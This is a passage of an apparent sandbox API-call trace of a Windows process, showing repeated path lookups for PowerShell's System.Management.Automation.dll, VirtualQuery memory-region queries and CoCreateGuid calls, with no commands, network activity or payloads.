	[0285.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.692] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.702] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.702] VirtualQuery (in: lpAddress=0x20b8d0, lpBuffer=0x20c790, dwLength=0x30 | out: lpBuffer=0x20c790*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.703] VirtualQuery (in: lpAddress=0x20afc0, lpBuffer=0x20be80, dwLength=0x30 | out: lpBuffer=0x20be80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.703] VirtualQuery (in: lpAddress=0x20b050, lpBuffer=0x20bf10, dwLength=0x30 | out: lpBuffer=0x20bf10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.703] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.703] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.703] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.704] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.706] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.707] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.707] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.707] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.707] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.707] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.707] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.504] VirtualQuery (in: lpAddress=0x20b400, lpBuffer=0x20c2c0, dwLength=0x30 | out: lpBuffer=0x20c2c0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.504] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.504] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.504] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.504] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.504] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xd574e221, Data2=0x5100, Data3=0x4286, Data4=([0]=0xae, [1]=0x1a, [2]=0x98, [3]=0x74, [4]=0xa3, [5]=0x35, [6]=0xa1, [7]=0x6a))) returned 0x0
	[0286.505] VirtualQuery (in: lpAddress=0x20afc0, lpBuffer=0x20be80, dwLength=0x30 | out: lpBuffer=0x20be80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.505] VirtualQuery (in: lpAddress=0x20b050, lpBuffer=0x20bf10, dwLength=0x30 | out: lpBuffer=0x20bf10*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.506] VirtualQuery (in: lpAddress=0x20b270, lpBuffer=0x20c130, dwLength=0x30 | out: lpBuffer=0x20c130*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.506] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x3703822b, Data2=0x4a6f, Data3=0x428f, Data4=([0]=0x84, [1]=0xd9, [2]=0xb0, [3]=0xfb, [4]=0xdf, [5]=0xbd, [6]=0xba, [7]=0x67))) returned 0x0
	[0286.506] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x6dfb238e, Data2=0x2805, Data3=0x48fe, Data4=([0]=0xad, [1]=0x27, [2]=0xfc, [3]=0x18, [4]=0xec, [5]=0x6c, [6]=0xea, [7]=0xa7))) returned 0x0
	[0286.507] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x3e1c89f5, Data2=0xbd2a, Data3=0x4496, Data4=([0]=0xb0, [1]=0x90, [2]=0xf8, [3]=0x54, [4]=0x5a, [5]=0x53, [6]=0xd0, [7]=0x30))) returned 0x0
	[0286.507] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xa9336b1c, Data2=0xc908, Data3=0x4c8d, Data4=([0]=0xbb, [1]=0xe7, [2]=0xee, [3]=0x20, [4]=0xa0, [5]=0xf0, [6]=0x41, [7]=0x1c))) returned 0x0
	[0286.507] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x5268c8ac, Data2=0x463e, Data3=0x4db6, Data4=([0]=0xb7, [1]=0xeb, [2]=0x42, [3]=0x90, [4]=0x5a, [5]=0x40, [6]=0xa6, [7]=0xb4))) returned 0x0
	[0286.507] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xa62a90ab, Data2=0xf55c, Data3=0x4140, Data4=([0]=0x80, [1]=0x8a, [2]=0x63, [3]=0xe5, [4]=0xc0, [5]=0x43, [6]=0x84, [7]=0x28))) returned 0x0
	[0286.508] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xa8102916, Data2=0x706e, Data3=0x490e, Data4=([0]=0xaa, [1]=0x94, [2]=0x29, [3]=0x22, [4]=0x7d, [5]=0xe0, [6]=0xd9, [7]=0xfd))) returned 0x0
	[0286.508] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xf558a84f, Data2=0x7ddf, Data3=0x4897, Data4=([0]=0xae, [1]=0x8c, [2]=0x7d, [3]=0x16, [4]=0x8b, [5]=0xb7, [6]=0x8f, [7]=0xd5))) returned 0x0
	[0286.508] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.508] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.508] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.509] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.509] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.509] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.509] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.509] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.509] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.510] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.510] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.510] VirtualQuery (in: lpAddress=0x20ae30, lpBuffer=0x20bcf0, dwLength=0x30 | out: lpBuffer=0x20bcf0*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.510] VirtualQuery (in: lpAddress=0x20aec0, lpBuffer=0x20bd80, dwLength=0x30 | out: lpBuffer=0x20bd80*(BaseAddress=0x20a000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.510] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.510] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.511] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.511] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.511] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.511] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.511] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0286.511] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x7945030e, Data2=0x9122, Data3=0x47e2, Data4=([0]=0x86, [1]=0xe8, [2]=0x3e, [3]=0xbe, [4]=0xc6, [5]=0x8c, [6]=0x76, [7]=0xa5))) returned 0x0
	[0286.511] VirtualQuery (in: lpAddress=0x20b740, lpBuffer=0x20c600, dwLength=0x30 | out: lpBuffer=0x20c600*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
